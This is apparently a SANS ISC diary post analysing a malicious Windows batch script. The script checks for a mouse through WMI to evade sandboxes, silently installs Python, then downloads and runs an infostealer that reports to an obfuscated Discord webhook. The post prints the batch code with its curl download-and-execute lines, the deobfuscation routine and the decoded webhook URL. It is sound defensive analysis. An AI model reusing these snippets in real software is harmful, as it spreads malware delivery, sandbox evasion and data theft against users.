Malware samples have plenty of techniques to detect if they are running in a “safe” environment. By safe, I mean a normal computer with a user between the keyboard and the chair, programs running, etc. These techniques are based on checking the presence of specific processes, registry keys, or files. The hardware can also be a good indicator (are some devices present or not?)
Some techniques rely on basic checks that can be easily implemented in a simple Windows script (.bat) file. I found an interesting one that performs a basic check before downloading the next payload. The file has the following SHA256 hash: 460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb[1]
set "mouseConnected=false" for /f "tokens=2 delims==" %%I in ('wmic path Win32_PointingDevice get PNPDeviceID /value ^| find "PNPDeviceID"') do ( set "mouseConnected=true" ) if not !mouseConnected! == true ( exit /b 1 )
The script uses the WMI (“Windows Management Instrumentation”) client to query the hardware and filter interesting devices. Here is an output generated on a regular computer:
C:UsersREMDesktop>wmic path Win32_PointingDevice get PNPDeviceID /value PNPDeviceID=ACPIPNP0F134&1BD7F811&0 PNPDeviceID=USBVID_0E0F&PID_0003&MI_017&12E62A01&0&0001 PNPDeviceID=USBVID_0E0F&PID_0003&MI_007&12E62A01&0&0000
Indeed some basic sandboxes do not have a mouse connected to them. Easy trick! Note that, in a lot of organizations, access to the “wmic” tool is prohibited for normal users because it can be used to perform a lot of sensitive actions.
If no mouse is detected, the script will fetch its copy of a minimal Python environment and install it:
set "eee=https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe" set "eeee=python-installer.exe" curl -L -o !eeee! !eee! --insecure --silent start /wait !eeee! /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0 > NUL 2>&1 del !eeee!
Finally, it will download and execute the second stage:
set "ENCODED_URL=hxxps://rentry[.]co/zph33gvz/raw set "OUTPUT_FILE=webpage.py" curl -o %OUTPUT_FILE% -s %ENCODED_URL% --insecure if %ERRORLEVEL% neq 0 ( echo Error: Failed to download the webpage. exit /b 1 ) python -m %OUTPUT_FILE% del %OUTPUT_FILE%
The second stage is another InfoStealer. Nothing special except the way the DIscord channel used as C2 is obfuscated:
webhook = b'xc8~~xc9(T>>x10x1e(x82=xa1x10x95x82=$>xbcxc9x1e>lM1xc8=={(>xb08-Z-xb3-x8b8x8bx1bxb0xb3xb0xb08x87Zx8b>xf91xe0f&x82gxe0xa7gx98xf0Yxd60xcdXxb4xb4xfexa6xc9xc9l~Y(gxf8x1c&x82xd6Nfx87exe0xf7)xf70e_,8xfexa6Zx1cxe28Mxaf_xc6,1Exf7N_xf2,_x1bne',b'x.x8dV+xb1cx94x9cwxb5x8ct]x12rx91[5yx8ax15Lxe5Bqxd0xa5x0cxd9xe8x9fxddx93Jxd4x88xb8x84xa3Kx02x0fxa8Ex95>-xb08x87x8bx1bxb3xf2x18ZTGx16xb2ixcfx11xb4xf7x07x1cuOYxcdxe0_,m&xf0xaaXxfeWxafx90xf9xc6xaexf8x08nx7fxabx014ex9axbc1x82x10M)fxc8x1exd6{g$xe2=xc9x98xa1(~Nxc5lxa6xa70xba/x053xb6bxfd"xdexa4hx9bIdxc1xc4xb9x96xf3x83x06xbd2Hxc7xc0xd5zxa0x99aoxefx13rx1dP7x14vxa2xeekxebxe1xbf9}:Rxe7'xbb<DQx9e^xfcxad%x8ex1fx97xc2Ux19x86x17x81xffxeaxfax9dFxa9p!xcc#xc3Cx85xdc|xf5j;xbeAxecxe4x80xd2xf4Sxb7xdbxe9x89xcbxd76x0bxe3`@x92x03xf1sxfbnxf6xd1xdaxd3x0exd8tx00x8fxedxe6xac xdfx04xca?*x1axce'
Is it decrypted using this simple function:
def DeobfuscateWeb(encrypted_text, key): decrypted = [0] * 256 for i, char in enumerate(key): decrypted[char] = i decrypted_text = [] for char in encrypted_text: decrypted_char = decrypted[char] decrypted_text.append(decrypted_char) return bytes(decrypted_text)
and returns “hxxps://discord[.]com/api/webhooks/1209060424516112394/UbIgMclIylqNGjzHPAAQxppwtGslXDMcjug3_IBfBz_JK2Qx9Dn2eSJVKb-BuJ7KJ5Z_”
[1] https://www.virustotal.com/gui/file/460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb/detection
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
Source: https://isc.sans.edu/diary/Simple+AntiSandbox+Technique+Wheres+The+Mouse/30684/